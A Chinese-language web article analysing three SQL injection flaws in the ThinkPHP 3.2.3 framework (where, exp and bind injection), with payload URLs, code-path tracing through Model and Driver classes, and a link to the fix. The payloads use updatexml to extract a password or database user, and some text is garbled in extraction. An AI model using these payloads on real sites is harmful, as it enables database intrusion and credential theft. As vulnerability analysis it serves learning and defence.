您当前的位置：首页 > 电脑百科 > 程序开发 > 语言 > php

ThinkPhp3漏洞原理分析总结

时间：2020-05-06 11:19:46 来源：作者：

+ 加入收藏

前言

Thinkphp是目前主流的一款php语言框架，但在使用中，也是产生了很多的高危漏洞。本文小编将从Thinkphp3说起，说明一些tp3框架的漏洞产生原理。使广大爱好者进一步深刻的理解框架。

环境搭建

下载源码

编辑器使用了phpstrom

配置数据库

添加测试数据

Thinkphp3.2.3 where注入

payload

?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)%23

断点

分析

经过htmlspecialchars过滤

于442行通过think_filter函数进行过滤

经过ThinkPHP/Library/Think/Model.class.php:779的find()方法

满足条件则进入

强制进行转换，转换为了int形

带入查询

步骤

id=1' -> I() -> find() -> __parseoptions(） ->_parseType()

满足条件才能进去__parseOptions()方法

条件

if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join']))

绕过

index.php?id[where]=3 and 1=1

修复

Thinkphp 3.2.3 exp注入

部署环境

payload

http://localhost:8888/tp3/index.php?username[0]=exp&username[1]==1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)

分析

进入Model.class.php的822行this−>select(this−>select(options)

跟进select方法

跟踪Driver.class.php中的parseSql方法

跟踪Driver.class.php中的parseWhere方法

经过whereStr.=whereStr.=this->parseWhereItem(this−>parseKey(this−>parseKey(key), $val)方法，跟踪进去

需要时数组才可以进去if语句

语句exp直接拼接构成注入

 } elseif ('bind' == $exp) {
                    // 使用表达式
 $whereStr .= $key . ' = :' . $val[1];

修复

使用I方法接受会通过think_filter函数进行过滤

thinkphp 3.2.3 bind注入

payload

index.php?id[0]=bind&id[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)&password=1

环境部署

    public function index()
    {
        $User = M("Users");
        $user['id'] = I('id');
        $data['password'] = I('password');
        $valu = $User->where($user)->save($data);
        var_dump($valu);
    }

上文说到除了exp还有bind可以进行注入

报错

进入update方法

进入到了parseWhereItem方法（bind可以注入）

于函数bindParam进行了添加冒号

在Driver.class.php文件execute中进行冒号替换

if (!empty($this->bind)) {
            $that           = $this;
            $this->queryStr = strtr($this->queryStr, array_map(function ($val) use ($that) {return ''' . $that->escapeString($val) . ''';}, $this->bind));
}

如果payload不是0的话

修复

https://github.com/top-think/thinkphp/commit/7e47e34af72996497c90c20bcfa3b2e1cedd7fa4

Tags：ThinkPhp3 漏洞点击:() 评论:()

声明：本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com)，我们将及时更正、删除，谢谢。

▌相关推荐

ThinkPhp3漏洞原理分析总结

前言ThinkPhp是目前主流的一款php语言框架，但在使用中，也是产生了很多的高危漏洞。本文小编将从Thinkphp3说起，说明一些tp3框架的漏洞产生原理。使广大爱好者进一步深刻的理解...【详细内容】

2020-05-06　　Tags: ThinkPhp3 漏洞点击:(142)　　评论:(0)　　加入收藏

▌简易百科推荐

php常见的后台内容管理系统，非常适合初级程序员的建站系统

序言：前段时间织梦因为版权的问题在网上闹得沸沸扬扬，也提醒了众多开发者选择cms上应该谨慎使用，今天给大家展示一款自己搭建的内容管理系统，不用担心版权的问题，而且非常容易维...【详细内容】

2021-11-30　　小程序软件开发　　　　Tags:管理系统　点击:(34)　　评论:(0)　　加入收藏

CentOS7下安装PHP8.0

准备安装包（PHP: Hypertext Preprocessor）下载安装包以及组件wget https://www.php.net/distributions/php-8.0.0.tar.bz2wget https://github.com/phpredis/phpredis/archive...【详细内容】

2021-11-09　　mimic96　　　　Tags:PHP 　点击:(40)　　评论:(0)　　加入收藏

PHP 实现Golang Context包

golang context 很好用，就使用php实现了github地址： https://github.com/qq1060656096/php-go-context context使用闭坑指南1. 将一个Context参数作为第一个参数传递给传入和...【详细内容】

2021-11-05　　1060656096　　　　Tags:PHP 　点击:(41)　　评论:(0)　　加入收藏

PHP 二维数组根据某个键值给二位数组分类

一段数组为例：$list = array:4 [ 0 => array:7 [ "id" => 56 "mer_id" => 7 "order_id" => "wx163265961408769974" "is_postage" => 0 "store_name" => "奇...【详细内容】

2021-09-29　　七七小影视　　　　Tags:PHP 　点击:(65)　　评论:(0)　　加入收藏

PHP-JS-AES对称加密解密代码实现

利用JS的CryptoJS 3.x和PHP的openssl_encrypt,openssl_decrypt实现AES对称加密解密，由于需要两种语言对同一字符串的操作，而CryptoJS 的默认加密方式为“aes-256-cbc”，PHP端也...【详细内容】

2021-09-16　　李老师tome　　　　Tags:对称加密　点击:(79)　　评论:(0)　　加入收藏

PHP时间函数总结

1、checkdate()验证格利高里日期即：日期是否存在。checkdate(month,day,year);month必需。一个从 1 到 12 的数字，规定月。day必需。一个从 1 到 31 的数字，规定日。year必需。...【详细内容】

2021-08-31　　七七小影视　　　　Tags:时间函数　点击:(80)　　评论:(0)　　加入收藏

PHP中操作任意精度大小的GMP扩展学习

对于各类开发语言来说，整数都有一个最大的位数，如果超过位数就无法显示或者操作了。其实，这也是一种精度越界之后产生的精度丢失问题。在我们的 PHP 代码中，最大的整数非常大，我...【详细内容】

2021-08-26　　硬核项目经理　　　　Tags:PHP 　点击:(83)　　评论:(0)　　加入收藏

「PHP数据结构」线性表？顺序表？链表？别再傻傻分不清楚

遵从所有教材以及各类数据结构相关的书书籍，我们先从线性表开始入门。今天这篇文章更偏概念，是关于有线性表的一个知识点的汇总。上文说过，物理结构是用于确定数据以何种方式存...【详细内容】

2021-07-19　　硬核项目经理　　　　Tags:线性表　点击:(94)　　评论:(0)　　加入收藏

Windows下用IIS搭建PHP环境（IIS+PHP+Mysql+phpMyAdmin）

一、开启IIS全部功能。二、部署PHP1.官网下载并解压PHP： https://windows.php.net/downloads/releases/2.将php.ini-development文件改为php.ini3.修改php.ini（1）去掉注释，并修...【详细内容】

2021-07-15　　炘蓝火诗　　今日头条　　Tags:PHP环境　点击:(129)　　评论:(0)　　加入收藏

CentOS7下编译安装PHP8.0.7

一、环境说明本文中使用本地VM虚机部署测试。OS：CentOS Linux release 7.8.2003 (Core)虚机配置：2核CPU、4G内存①系统为CentOS 7.8 x64最小化安装，部署前已完成系统初始化、...【详细内容】

2021-06-25　　IT运维笔记　　今日头条　　Tags:PHP8.0.7 　点击:(141)　　评论:(0)　　加入收藏

推荐资讯

聊聊如何自定义数据脱	河南人到底有多爱吃面
人称“犬中四煞”的4	离婚后，约定每月给孩子
“三皇五帝”分别是哪	印度低种姓群体如何翻
日本研发“飞行摩托”	2021年Steam最畅销游